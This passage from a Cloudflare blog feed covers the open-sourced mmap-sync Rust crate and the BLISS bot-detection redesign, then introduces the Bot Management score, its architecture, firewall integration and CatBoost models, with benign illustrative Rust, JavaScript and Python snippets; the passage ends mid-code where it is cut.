    <p>Leveraging the benefits of <b>memory-mapped files</b>, <b>wait-free synchronization</b> and <b>zero-copy deserialization</b>, we've crafted a unique and powerful tool for managing high-performance, concurrent data access between processes. We've packaged these concepts into a Rust crate named <a href="https://github.com/cloudflare/mmap-sync"><code><b>mmap-sync</b></code></a>, which we're thrilled to open-source for the wider community.</p><p>At the core of the <code><b>mmap-sync</b></code> package is a structure named <code><b>Synchronizer</b></code>. It offers an avenue to read and write any data expressible as a Rust struct. Users simply have to implement or derive a specific Rust trait around the struct definition - a task requiring just a single line of code. The <code><b>Synchronizer</b></code> presents an elegantly simple interface, equipped with "write" and "read" methods.</p>
            <pre><code>impl Synchronizer {
    /// Write a given `entity` into the next available memory mapped file.
    pub fn write&lt;T&gt;(&amp;mut self, entity: &amp;T, grace_duration: Duration) -&gt; Result&lt;(usize, bool), SynchronizerError&gt; {
        …
    }

    /// Reads and returns `entity` struct from mapped memory wrapped in `ReadResult`
    pub fn read&lt;T&gt;(&amp;mut self) -&gt; Result&lt;ReadResult&lt;T&gt;, SynchronizerError&gt; {
        …
    }
}

/// FeaturesMetadata stores features along with their metadata
#[derive(Archive, Deserialize, Serialize, Debug, PartialEq)]
#[archive_attr(derive(CheckBytes))]
pub struct FeaturesMetadata {
    /// Features version
    pub version: u32,
    /// Features creation Unix timestamp
    pub created_at: u32,
    /// Features represented by vector of hash maps
    pub features: Vec&lt;HashMap&lt;u64, Vec&lt;f32&gt;&gt;&gt;,
}</code></pre>
            <p>A read operation through the <code><b>Synchronizer</b></code> performs zero-copy deserialization and returns a "guarded" <code><b>Result</b></code> encapsulating a reference to the Rust struct using <a href="https://rust-unofficial.github.io/patterns/patterns/behavioural/RAII.html">RAII design pattern</a>. This operation also increments the atomic counter of active readers using the struct. Once the <code><b>Result</b></code> is out of scope, the <code><b>Synchronizer</b></code> decrements the number of readers.</p><p>The synchronization mechanism used in <code><b>mmap-sync</b></code> is not only "lock-free" but also "wait-free". This ensures an upper bound on the number of steps an operation will take before it completes, thus providing a performance guarantee.</p><p>The data is stored in shared mapped memory, which allows the <code><b>Synchronizer</b></code> to “write” to it and “read” from it concurrently. This design makes <code><b>mmap-sync</b></code> a highly efficient and flexible tool for managing shared, concurrent data access.</p><p>Now, with an understanding of the underlying mechanics of <code><b>mmap-sync</b></code>, let's explore how this package plays a key role in the broader context of our Bot Management platform, particularly within the newly developed components: the <code><b>bliss</b></code> service and library.</p>
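<p>The reader-counting side of that RAII guard can be sketched in a few lines of Rust. The names here are illustrative, not <code>mmap-sync</code>'s actual types.</p>

```rust
use std::sync::atomic::{AtomicU32, Ordering};

/// RAII guard sketch: constructing it registers a reader on the chosen
/// data copy; dropping it unregisters the reader. The writer can then
/// wait until the count for the inactive copy drains to zero before
/// reusing that copy.
pub struct ReadGuard<'a> {
    readers: &'a AtomicU32,
}

impl<'a> ReadGuard<'a> {
    /// Increment the active-reader counter and hold it until drop.
    pub fn acquire(readers: &'a AtomicU32) -> Self {
        readers.fetch_add(1, Ordering::SeqCst);
        ReadGuard { readers }
    }
}

impl Drop for ReadGuard<'_> {
    fn drop(&mut self) {
        // Decrement when the guard goes out of scope.
        self.readers.fetch_sub(1, Ordering::SeqCst);
    }
}
```

<p>Because both operations are single atomic instructions, every reader completes its bookkeeping in a bounded number of steps — the property that makes the scheme wait-free rather than merely lock-free.</p>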
    <div>
      <h2>System design overhaul</h2>
      <a href="#system-design-overhaul">
        
      </a>
    </div>
    <p>Transitioning from a Lua-based module that made memcached requests over Unix socket to Gagarin in Go to fetch machine learning features, our new design represents a significant evolution. This change pivots around the introduction of <code><b>mmap-sync</b></code>, our newly developed Rust package, laying the groundwork for a substantial performance upgrade. This development led to a comprehensive system redesign and introduced two new components that form the backbone of our <i>Bots Liquidation Intelligent Security System</i> - or <b>BLISS</b>, in short: the bliss service and the bliss library.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Dnl0GqLtcqoPZ3ceZuxTG/efa55a49b326fe71821f2f6be9935b8a/after-bliss-diagram-v2.png" />
            
            </figure>
    <div>
      <h3>Bliss service</h3>
      <a href="#bliss-service">
        
      </a>
    </div>
    <p>The <b>bliss</b> <b>service</b> operates as a Rust-based, multi-threaded sidecar daemon. It has been designed for optimal batch processing of vast data quantities and extensive I/O operations. Among its key functions, it fetches, parses, and stores machine learning features and dimensions for effortless data access and manipulation. This has been made possible through the incorporation of the <a href="https://tokio.rs/">Tokio</a> event-driven platform, which allows for efficient, non-blocking I/O operations.</p>
    <div>
      <h3>Bliss library</h3>
      <a href="#bliss-library">
        
      </a>
    </div>
    <p>Operating as a single-threaded dynamic library, the <b>bliss library</b> seamlessly integrates into each worker thread using the Foreign Function Interface (FFI) via a Lua module. Optimized for minimal resource usage and ultra-low latency, this lightweight library performs tasks without the need for heavy I/O operations. It efficiently serves machine learning features and generates corresponding detections.</p><p>In addition to leveraging the <code><b>mmap-sync</b></code> package for efficient machine learning feature access, our new design includes several other performance enhancements:</p><ul><li><p><b>Allocations-free operation:</b> bliss library re-uses pre-allocated data structures and performs no heap allocations, only low-cost stack allocations. To enforce our zero-allocation policy, we run integration tests using the <a href="https://docs.rs/dhat/latest/dhat/">dhat heap profiler</a>.</p></li><li><p><b>SIMD optimizations</b>: wherever possible, the bliss library employs vectorized CPU instructions. For instance, AVX2 and SSE4 instruction sets are used to expedite <a href="https://crates.io/crates/faster-hex">hex-decoding</a> of certain request attributes, enhancing speed by tenfold.</p></li><li><p><b>Compiler tuning:</b> We compile both the bliss service and library with the following flags for superior performance:</p></li></ul>
            <pre><code>[profile.release]
codegen-units = 1
debug = true
lto = "fat"
opt-level = 3</code></pre>
            <ul><li><p><b>Benchmarking &amp; profiling:</b> We use <a href="https://bheisler.github.io/criterion.rs/book/index.html">Criterion</a> for benchmarking every major feature or component within bliss. Moreover, we are also able to use the Go pprof profiler on Criterion benchmarks to view flame graphs and more:</p></li></ul>
            <pre><code>cargo bench -p integration -- --verbose --profile-time 100

go tool pprof -http=: ./target/criterion/process_benchmark/process/profile/profile.pb</code></pre>
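<p>As a rough illustration of the allocation-free hex decoding mentioned above: the bliss library uses the SIMD-accelerated <code>faster-hex</code> crate, but the caller-provided-buffer pattern it relies on looks like this scalar sketch.</p>

```rust
/// Decode ASCII hex into a caller-provided output buffer: no heap
/// allocations, so it fits a zero-allocation policy. Scalar sketch of
/// the pattern; faster-hex accelerates the same job with AVX2/SSE4.
pub fn hex_decode(input: &[u8], out: &mut [u8]) -> Result<usize, ()> {
    fn nibble(b: u8) -> Result<u8, ()> {
        match b {
            b'0'..=b'9' => Ok(b - b'0'),
            b'a'..=b'f' => Ok(b - b'a' + 10),
            b'A'..=b'F' => Ok(b - b'A' + 10),
            _ => Err(()),
        }
    }
    // Reject odd-length input and undersized output buffers up front.
    if input.len() % 2 != 0 || out.len() < input.len() / 2 {
        return Err(());
    }
    for (i, pair) in input.chunks_exact(2).enumerate() {
        out[i] = (nibble(pair[0])? << 4) | nibble(pair[1])?;
    }
    Ok(input.len() / 2)
}
```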
            <p>This comprehensive overhaul of our system has not only streamlined our operations but also has been instrumental in enhancing the overall performance of our Bot Management platform. Stay tuned to witness the remarkable changes brought about by this new architecture in the next section.</p>
    <div>
      <h2>Rollout results</h2>
      <a href="#rollout-results">
        
      </a>
    </div>
    <p>Our system redesign has brought some truly "blissful" dividends. Above all, our commitment to a seamless user experience and the trust of our customers have guided our innovations. We ensured that the transition to the new design was seamless, maintaining full backward compatibility, with no customer-reported false positives or negatives encountered. This is a testament to the robustness of the new system.</p><p>As the old adage goes, the proof of the pudding is in the eating. This couldn't be truer when examining the dramatic latency improvements achieved by the redesign. Our overall processing latency for HTTP requests at Cloudflare improved by an average of <b>12.5%</b> compared to the previous system.</p><p>This improvement is even more significant in the Bot Management module, where latency improved by an average of <b>55.93%</b>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5CEtjyqdZ3W1566LlcJCmY/8df07e319288090092413f3217b46464/image6.png" />
            
            </figure><p>Bot Management module latency, in microseconds.</p><p>More specifically, our machine learning features fetch latency has improved by several orders of magnitude:</p>
<table>
<thead>
  <tr>
    <th><span>Latency metric</span></th>
    <th><span>Before (μs)</span></th>
    <th><span>After (μs)</span></th>
    <th><span>Change</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>p50</span></td>
    <td><span>532</span></td>
    <td><span>9</span></td>
    <td><span>-98.30%</span><span> or </span><span>x59</span></td>
  </tr>
  <tr>
    <td><span>p99</span></td>
    <td><span>9510</span></td>
    <td><span>18</span></td>
    <td><span>-99.81%</span><span> or </span><span>x528</span></td>
  </tr>
  <tr>
    <td><span>p999</span></td>
    <td><span>16000</span></td>
    <td><span>29</span></td>
    <td><span>-99.82%</span><span> or </span><span>x551</span></td>
  </tr>
</tbody>
</table><p>To truly grasp this impact, consider this: with Cloudflare’s average rate of 46 million requests per second, a saving of <b>523 microseconds</b> per request equates to saving over 24,000 days or <b>65 years</b> of processing time every single day!</p><p>In addition to latency improvements, we also reaped other benefits from the rollout:</p><ul><li><p><b>Enhanced feature availability</b>: thanks to eliminating Unix socket timeouts, machine learning feature availability is now a robust 100%, resulting in fewer false positives and negatives in detections.</p></li><li><p><b>Improved resource utilization</b>: our system overhaul liberated resources equivalent to thousands of CPU cores and hundreds of gigabytes of RAM - a substantial enhancement of our server fleet's efficiency.</p></li><li><p><b>Code cleanup:</b> another positive spin-off has been in our Lua and Go code. Thousands of lines of less performant and less memory-safe code have been weeded out, reducing technical debt.</p></li><li><p><b>Upscaled machine learning capabilities:</b> last but certainly not least, we've significantly expanded our machine learning features, dimensions, and models. This upgrade empowers our machine learning inference to handle hundreds of machine learning features and dozens of dimensions and models.</p></li></ul>
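<p>The time-savings arithmetic above checks out, as this quick calculation using the figures quoted in the text shows.</p>

```rust
/// Sanity-check: at 46M requests/second, saving 523 microseconds per
/// request. Returns (days, years) of processing time saved per day.
pub fn processing_time_saved_per_day() -> (f64, f64) {
    let requests_per_second = 46_000_000.0_f64;
    let saved_per_request_s = 523e-6_f64;
    // CPU-seconds saved during each wall-clock second: ~24,058
    let saved_s_per_s = requests_per_second * saved_per_request_s;
    // Seconds-per-second equals days-per-day, so this is also the
    // number of days of processing time saved every single day.
    let saved_days_per_day = saved_s_per_s;
    let saved_years_per_day = saved_days_per_day / 365.25; // ~65.9
    (saved_days_per_day, saved_years_per_day)
}
```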
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>In the wake of our redesign, we've constructed a powerful and efficient system that truly embodies the essence of 'bliss'. Harnessing the advantages of memory-mapped files, wait-free synchronization, allocation-free operations, and zero-copy deserialization, we've established a robust infrastructure that maintains peak performance while achieving remarkable reductions in latency. As we navigate towards the future, we're committed to leveraging this platform to further improve our Security machine learning products and cultivate innovative features. Additionally, we're excited to share parts of this technology through an open-sourced Rust package <a href="https://github.com/cloudflare/mmap-sync"><code><b>mmap-sync</b></code></a>.</p><p>As we leap into the future, we are building upon our platform's impressive capabilities, exploring new avenues to amplify the power of machine learning. We are deploying a new machine learning model built on BLISS with select customers. If you are a Bot Management subscriber and want to test the new model, please reach out to your account team.</p><p>Separately, we are on the lookout for more Cloudflare customers who want to run their own machine learning models at the edge today. If you’re a developer considering making the switch to Workers for your application, sign up for our <a href="/introducing-constellation/">Constellation AI closed beta</a>. If you’re a Bot Management customer and looking to run an already trained, lightweight model at the edge, <a href="https://www.cloudflare.com/lp/byo-machine-learning-model/">we would love to hear from you</a>. Let's embark on this path to bliss together.</p> ]]></content:encoded>
            <category><![CDATA[Speed Week]]></category>
            <category><![CDATA[Performance]]></category>
            <category><![CDATA[Bot Management]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[Rust]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">5okRPYMr2V3a9DYVL5fLJw</guid>
            <dc:creator>Alex Bocharov</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Bot Management: machine learning and more]]></title>
            <link>https://blog.cloudflare.com/cloudflare-bot-management-machine-learning-and-more/</link>
            <pubDate>Wed, 06 May 2020 11:00:00 GMT</pubDate>
            <description><![CDATA[ This is the ongoing story of Bot Management at Cloudflare and also an introduction to a series of blog posts about the detection mechanisms powering it ]]></description>
            <content:encoded><![CDATA[ <p></p>
    <div>
      <h3>Introduction</h3>
      <a href="#introduction">
        
      </a>
    </div>
    <p>Building <a href="https://www.cloudflare.com/application-services/products/bot-management/">Cloudflare Bot Management platform</a> is an exhilarating experience. It blends Distributed Systems, Web Development, Machine Learning, Security and Research (and every discipline in between) while fighting ever-adaptive and motivated adversaries at the same time.</p><p>This is the ongoing story of Bot Management at Cloudflare and also an introduction to a series of blog posts about the detection mechanisms powering it. I’ll start with several definitions from the Bot Management world, then introduce the product and technical requirements, leading to an overview of the platform we’ve built. Finally, I’ll share details about the detection mechanisms powering our platform.</p><p>Let’s start with Bot Management’s nomenclature.</p>
    <div>
      <h3>Some Definitions</h3>
      <a href="#some-definitions">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/learning/bots/what-is-a-bot/"><b>Bot</b></a> - an autonomous program on a network that can interact with computer systems or users, imitating or replacing a human user's behavior, performing repetitive tasks much faster than human users could.</p><p><b>Good bots</b> - bots which are useful to businesses they interact with, e.g. <a href="https://www.cloudflare.com/learning/bots/what-is-a-web-crawler/">search engine bots</a> like Googlebot, Bingbot or bots that operate on social media platforms like Facebook Bot.</p><p><b>Bad bots</b> - bots which are designed to perform malicious actions, ultimately hurting businesses, e.g. <a href="https://www.cloudflare.com/learning/bots/what-is-credential-stuffing/">credential stuffing</a> bots, <a href="https://www.cloudflare.com/learning/bots/what-is-data-scraping/">third-party scraping</a> bots, <a href="https://www.cloudflare.com/learning/bots/what-is-a-spambot/">spam</a> bots and sneakerbots.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5nwyutK4DVA1cjsfMY8ore/fd2ebf6ec92ec7795ea423f4e7d61713/image12.png" />
            
            </figure><p><a href="https://www.cloudflare.com/learning/bots/what-is-bot-management/"><b>Bot Management</b></a> - blocking undesired or malicious Internet bot traffic while still allowing useful bots to access web properties by detecting bot activity, discerning between desirable and undesirable bot behavior, and identifying the sources of the undesirable activity.</p><p><a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/"><b>WAF</b></a> - a security system that monitors and controls network traffic based on a set of security rules.</p>
    <div>
      <h3>Gathering requirements</h3>
      <a href="#gathering-requirements">
        
      </a>
    </div>
    <p>Cloudflare has been stopping malicious bots from accessing websites or misusing <a href="https://www.cloudflare.com/learning/security/api/what-is-an-api/">APIs</a> from the very <a href="/cloudflare-uses-intelligent-caching-to-avoid/">beginning</a>, at the same time <a href="/cleaning-up-bad-bots/">helping the climate</a> by offsetting the carbon costs from the bots. Over time it became clear that we needed a dedicated platform which would unite different bot fighting techniques and streamline the customer experience. In designing this new platform, we tried to fulfill the following key requirements.</p><ul><li><p><b>Complete, not complex</b> - customers can turn on/off Bot Management with a single click of a button, to protect their websites, mobile applications, or <a href="https://www.cloudflare.com/application-services/solutions/api-security/">APIs</a>.</p></li><li><p><b>Trustworthy</b> - customers want to know whether they can trust that a website visitor is who they claim to be, with a certainty indicator for that trust level.</p></li><li><p><b>Flexible</b> - customers should be able to define what subset of the traffic Bot Management mitigations should be applied to, e.g. only login URLs, pricing pages or sitewide.</p></li><li><p><b>Accurate</b> - Bot Management detections should have a very small error rate, e.g. no (or very few) human visitors should ever be mistakenly identified as bots.</p></li><li><p><b>Recoverable</b> - in case a wrong prediction is made, human visitors should still be able to access websites, and good bots should still be let through.</p></li></ul><p>Moreover, the goal for the new Bot Management product was to make it work well on the following use cases:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5z0o8rXLkecZWUhx1UDRHF/78e1e55cc47dac3d8bb58ac274870387/image8.png" />
            
            </figure>
    <div>
      <h3>Technical requirements</h3>
      <a href="#technical-requirements">
        
      </a>
    </div>
    <p>In addition to the product requirements above, we engineers had a list of must-haves for the new Bot Management platform. The most critical were:</p><ul><li><p><b>Scalability</b> - the platform should be able to calculate a score on every request, even at over 10 million requests per second.</p></li><li><p><b>Low latency</b> - detections must be performed extremely quickly, not slowing down request processing by more than 100 microseconds, and not requiring additional hardware.</p></li><li><p><b>Configurability</b> - it should be possible to configure what detections are applied on what traffic, including on per domain/data center/server level.</p></li><li><p><b>Modifiability</b> - the platform should be easily extensible with more detection mechanisms, different mitigation actions, richer analytics and logs.</p></li><li><p><b>Security</b> - no sensitive information from one customer should be used to build models that protect another customer.</p></li><li><p><b>Explainability &amp; debuggability</b> - we should be able to explain and tune predictions in an intuitive way.</p></li></ul><p>Equipped with these requirements, back in 2018, our small team of engineers got to work to design and build the next generation of Cloudflare Bot Management.</p>
    <div>
      <h3>Meet the Score</h3>
      <a href="#meet-the-score">
        
      </a>
    </div>
    <blockquote><p><i>“Simplicity is the ultimate sophistication.” - Leonardo da Vinci</i></p></blockquote><p>Cloudflare operates on a vast scale. At the time of this writing, this means covering 26M+ Internet properties, processing on average 11M requests per second (with peaks over 14M), and examining more than 250 request attributes from different protocol levels. The key question is how to harness the power of such “gargantuan” data to <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/">protect all of our customers from modern day cyberthreats</a> in a simple, reliable and explainable way.</p><p>Bot management is hard. Some bots are much harder to detect, requiring us to look at multiple dimensions of request attributes over a long period of time, while others can be given away by a single request attribute. More signals may help, but are they generalizable?</p><p>When we classify traffic, should customers decide what to do with it, or are there decisions we can make on behalf of the customer? What concept could possibly address all these uncertainty problems and also help us to deliver on the requirements above?</p><p>As you might’ve guessed from the section title, we came up with the concept of the Trusted Score, or simply <b>The Score</b>: one thing to rule them all, indicating the likelihood, between 0 and 100, that a request originated from a human (high score) rather than an automated program (low score).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3caFJFhAGnz4989GtGg5s4/c03d3fd90168d7d35f79dcc547912db7/image5-1.jpg" />
            
            </figure><p><a href="https://www.flickr.com/photos/purple-lover/13583362554">"One Ring to rule them all"</a> by idreamlikecrazy, used under <a href="https://creativecommons.org/licenses/by/2.0/">CC BY</a> / Desaturated from original</p><p>Okay, let’s imagine that we are able to assign such a score on every incoming HTTP/HTTPS request; what are we, or the customer, supposed to do with it? Maybe it’s enough to provide such a score in the logs. Customers could then analyze them on their end, find the most frequent IPs with the lowest scores, and then use the <a href="https://www.cloudflare.com/application-services/products/waf/">Cloudflare Firewall</a> to block those IPs. Although useful, such a process would be manual, prone to error and, most importantly, could not be done in real time to protect the customer's Internet property.</p><p>Fortunately, around the same time we started working on this system, our colleagues from the Firewall team had <a href="/announcing-firewall-rules/">just announced Firewall Rules</a>. This new capability provided customers the ability to control requests in a flexible and intuitive way, inspired by the widely known Wireshark® language. Firewall rules supported a variety of request fields, and we thought - why not have the score be one of these fields? Customers could then write granular rules to block very specific attack types. That’s how the <code>cf.bot_management.score</code> field was born.</p><p>Having a score at the heart of Cloudflare Bot Management addressed multiple product and technical requirements in one stroke - it’s simple, flexible, configurable, and it provides customers with telemetry about bots on a per request basis. Customers can adjust the score threshold in firewall rules, depending on their sensitivity to false positives/negatives. 
Additionally, this intuitive score allows us to extend our detection capabilities under the hood without customers needing to adjust any configuration.</p><p>So how can we produce this score and how hard is it? Let’s explore it in the following section.</p>
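To make this concrete, here is an illustrative Firewall Rules expression using the score field; the path and the threshold of 30 are arbitrary choices for illustration, not recommendations:

```
(http.request.uri.path eq "/login" and cf.bot_management.score lt 30 and not cf.bot_management.verified_bot)
```

Paired with a Challenge action (selected separately in the dashboard or via Terraform), a rule like this challenges likely-automated logins while leaving verified good bots and high-scoring human traffic untouched.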
    <div>
      <h3>Architecture overview</h3>
      <a href="#architecture-overview">
        
      </a>
    </div>
    <p>What is powering the Bot Management score? The short answer is a set of <a href="https://www.cloudflare.com/learning/serverless/glossary/serverless-microservice/">microservices</a>. In building this platform we tried to reuse as many pipelines, databases and components as we could; however, many services had to be built from scratch. Let’s have a look at the overall architecture (this simplified version shows only the Bot Management related services):</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5OSC0Ty0XKfbmw651kO9bQ/ebfbf8204161f3db6622291ddb7e4721/image13.png" />
            
            </figure>
    <div>
      <h3>Core Bot Management services</h3>
      <a href="#core-bot-management-services">
        
      </a>
    </div>
    <p>In a nutshell, our systems process data received from the edge data centers, and produce and store the data required by the bot detection mechanisms, using the following technologies:</p><ul><li><p><b>Databases &amp; data stores</b> - <a href="/squeezing-the-firehose/">Kafka</a>, <a href="/http-analytics-for-6m-requests-per-second-using-clickhouse/">ClickHouse</a>, Postgres, Redis, Ceph.</p></li><li><p><b>Programming languages</b> - Go, Rust, Python, Java, Bash.</p></li><li><p><b>Configuration &amp; schema management</b> - Salt, <a href="/introducing-quicksilver-configuration-distribution-at-internet-scale/">Quicksilver</a>, <a href="https://capnproto.org/">Cap’n Proto</a>.</p></li><li><p><b>Containerization</b> - Docker, Kubernetes, Helm, Mesos/Marathon.</p></li></ul><p>Each of these services is built with resilience, performance, <a href="https://www.cloudflare.com/learning/performance/what-is-observability/">observability</a> and security in mind.</p>
    <div>
      <h3>Edge Bot Management module</h3>
      <a href="#edge-bot-management-module">
        
      </a>
    </div>
    <p>All bot detection mechanisms are applied on every request in real-time during the request processing stage in the Bot Management module running on every machine at Cloudflare’s edge locations. When a request comes in we extract and transform the required request attributes and feed them to our detection mechanisms. The Bot Management module produces the following output:</p><p><b>Firewall fields</b> - <a href="https://support.cloudflare.com/hc/en-us/articles/360027519452-Understanding-Cloudflare-Bot-Management">Bot Management fields</a>:</p><ul><li><p><b>cf.bot_management.score</b> - an integer indicating the likelihood, between 0 and 100, that a request originated from an automated program (low score) or a human (high score).</p></li><li><p><b>cf.bot_management.verified_bot</b> - a boolean indicating whether the request comes from a Cloudflare allowlisted bot.</p></li><li><p><b>cf.bot_management.static_resource</b> - a boolean indicating whether the request matches file extensions for many types of static resources.</p></li></ul><p><b>Cookies</b> - most notably it produces <a href="https://community.cloudflare.com/t/cf-bm-cookie/56696"><b>cf_bm</b></a>, which helps manage incoming traffic that matches criteria associated with bots.</p><p><b>JS challenges</b> - for some of our detections and customers we inject invisible JavaScript challenges into the page, providing us with more signals for bot detection.</p><p><b>Detection logs</b> - we log details about each applied detection, including used features and flags, through our data pipelines to ClickHouse; some of these are used for analytics and customer logs, while others are used to debug and improve our models.</p><p>Once the Bot Management module has produced the required fields, the Firewall takes over the actual bot mitigation.</p>
    <div>
      <h3>Firewall integration</h3>
      <a href="#firewall-integration">
        
      </a>
    </div>
    <p>The Cloudflare Firewall's intuitive dashboard enables users to build powerful rules in a few clicks, and it also provides Terraform integration. Every request is inspected against the rule engine. Based on the score produced by the Bot Management module and the configured threshold, suspicious requests can be blocked, challenged, or logged as per the needs of the user, while legitimate requests are routed to the destination.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5oSiddu0b8BknoqrAQfCYV/3c6c1e456a6d5dedae0e7e50ac7cf346/image6.png" />
            
            </figure><p>Firewall rules provide the following bot mitigation <a href="https://developers.cloudflare.com/firewall/cf-firewall-rules/actions/">actions</a>:</p><ul><li><p><b>Log</b> - records matching requests in the Cloudflare Logs provided to customers.</p></li><li><p><b>Bypass</b> - allows customers to dynamically disable Cloudflare security features for a request.</p></li><li><p><b>Allow</b> - matching requests are exempt from challenge and block actions triggered by other Firewall Rules content.</p></li><li><p><b>Challenge (Captcha)</b> - useful for ensuring that the visitor accessing the site is human, and not automated.</p></li><li><p><b>JS Challenge</b> - useful for ensuring that bots and spam cannot access the requested resource; browsers, however, are free to satisfy the challenge automatically.</p></li><li><p><b>Block</b> - matching requests are denied access to the site.</p></li></ul><p>Our <a href="/updates-to-firewall-analytics/">Firewall Analytics</a> tool, powered by ClickHouse and <a href="/introducing-the-graphql-analytics-api-exactly-the-data-you-need-all-in-one-place/">GraphQL API</a>, enables customers to quickly identify and investigate security threats using an intuitive interface. In addition to analytics, we provide detailed logs on all bot-related activity using either the <a href="https://developers.cloudflare.com/logs/logpull-api/">Logpull API</a> and/or <a href="/cloudflare-logpush-the-easy-way-to-get-your-logs-to-your-cloud-storage/">LogPush</a>, which provides an easy way to get your logs to your cloud storage.</p>
    <div>
      <h3>Cloudflare Workers integration</h3>
      <a href="#cloudflare-workers-integration">
        
      </a>
    </div>
    <p>If a customer wants more flexibility in what to do with requests based on the score, e.g. injecting new or changing existing HTML page content, serving incorrect data to bots, or stalling certain requests, <a href="https://www.cloudflare.com/developer-platform/workers/">Cloudflare Workers</a> provide an option to do exactly that. For example, using this small code snippet, we can pass the score back to the origin server for more advanced real-time analysis or mitigation:</p>
            <pre><code>// Register a handler for every incoming request
addEventListener('fetch', event =&gt; {
  event.respondWith(handleRequest(event.request))
})
 
async function handleRequest(request) {
  // Re-create the request so its headers become mutable
  request = new Request(request);
 
  // Forward the bot score to the origin in a request header
  request.headers.set("Cf-Bot-Score", request.cf.bot_management.score)
 
  return fetch(request);
}</code></pre>
            <p>Now let’s have a look into how a single score is produced using multiple detection mechanisms.</p>
    <div>
      <h3>Detection mechanisms</h3>
      <a href="#detection-mechanisms">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3avrETqHNSco30pzXKi2Bi/d83a61d9a294c2f96ed8ae3101fc8839/image10.png" />
            
            </figure><p>The Cloudflare Bot Management platform currently uses five complementary detection mechanisms, producing their own scores, which we combine to form the single score going to the Firewall. Most of the detection mechanisms are applied on every request, while some are enabled on a per-customer basis to better fit their needs.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kznWqiXGLzyUvqGbNgrco/3d3d777f8b268bcda1b319c841a518e9/image14.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2SlwP5FY8XUmzYUGbIne0n/f589b67119defdc46d4b80762f81d3f4/image4-1.png" />
            
            </figure><p>Having a score on every request for every customer has the following benefits:</p><ul><li><p><b>Ease of onboarding</b> - even before we enable Bot Management in active mode, we’re able to tell how well it’s going to work for the specific customer, including providing historical trends about bot activity.</p></li><li><p><b>Feedback loop</b> - availability of the score on every request along with all features has tremendous value for continuous improvement of our detection mechanisms.</p></li><li><p><b>Ensures scaling</b> - if we can compute a score for every request and every customer, it means that every Internet property behind Cloudflare is a potential Bot Management customer.</p></li><li><p><b>Global bot insights</b> - Cloudflare sits in front of 26M+ Internet properties, which allows us to understand and react to the tectonic shifts happening in security and threat intelligence over time.</p></li></ul><p>Globally, more than a third of the Internet traffic visible to Cloudflare comes from bad bots, while for Bot Management customers the ratio of bad bots is even higher, at ~43%!</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/18xm3tKE1ir3wbIDSb1oet/8c7675efd856354dd50648b001662839/image7.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79Mscr2mfcUGezTFmVG5nM/0bb09659f0707e84b8f8a15b52ba7af4/image9.png" />
            
            </figure><p>Let’s dive into specific detection mechanisms in chronological order of their integration with Cloudflare Bot Management.</p>
    <div>
      <h3>Machine learning</h3>
      <a href="#machine-learning">
        
      </a>
    </div>
    <p>The majority of decisions about the score are made using our machine learning models. These were also the first detection mechanisms to produce a score and to onboard customers back in 2018. The successful application of <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> requires data high in <a href="/stop-the-bots-practical-lessons-in-machine-learning/">Quantity, Diversity, and Quality</a>, and thanks to both free and paid customers, Cloudflare has all three, enabling continuous learning and improvement of our models for all of our customers.</p><p>At the core of the machine learning detection mechanism is CatBoost - a high-performance open source library for gradient boosting on decision trees. The choice of CatBoost was driven by the library’s outstanding capabilities:</p><ul><li><p><b>Categorical features support</b> - allowing us to train on even very high cardinality features.</p></li><li><p><b>Superior accuracy</b> - allowing us to reduce overfitting by using a novel gradient-boosting scheme.</p></li><li><p><b>Inference speed</b> - in our case it takes less than 50 microseconds to apply any of our models, making sure request processing stays extremely fast.</p></li><li><p><b>C and Rust API</b> - most of our business logic on the edge is written in Lua, more specifically LuaJIT, so having a compatible FFI interface for applying models is fantastic.</p></li></ul><p>Multiple CatBoost models run on Cloudflare’s edge in <a href="https://christophergs.com/machine%20learning/2019/03/30/deploying-machine-learning-applications-in-shadow-mode/#what">shadow mode</a> on <i>every request on every machine</i>. One of the models runs in active mode, influencing the final score going to the Firewall. All ML detection results and features are logged and recorded in ClickHouse for further analysis, model improvement, analytics and customer facing logs. We feed both categorical and numerical features into our models, extracted from request attributes and inter-request features built using those attributes, calculated and delivered by the <i>Gagarin</i> inter-request features platform.</p><p>We’re able to deploy new ML models in a matter of seconds using the extremely reliable and performant <a href="/introducing-quicksilver-configuration-distribution-at-internet-scale/">Quicksilver</a> configuration database. The same mechanism can be used to configure which version of an ML model should run in active mode for a specific customer.</p><p>A deep dive into our machine learning detection mechanism deserves a blog post of its own, and it will cover how we train and validate our models on trillions of requests using GPUs, how model feature delivery and extraction works, and how we explain and debug model predictions both internally and externally.</p>
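To build intuition for why tree-ensemble inference is so cheap, here is a minimal sketch of how gradient-boosted decision trees turn request features into a score. The trees, feature names, and the 1-99 scaling below are invented for illustration; this is not Cloudflare's actual model:

```python
import math

def eval_tree(tree, features):
    """Walk a toy decision tree: tuples are (feature, threshold, left, right); leaves are raw margins."""
    if not isinstance(tree, tuple):
        return tree
    feature, threshold, left, right = tree
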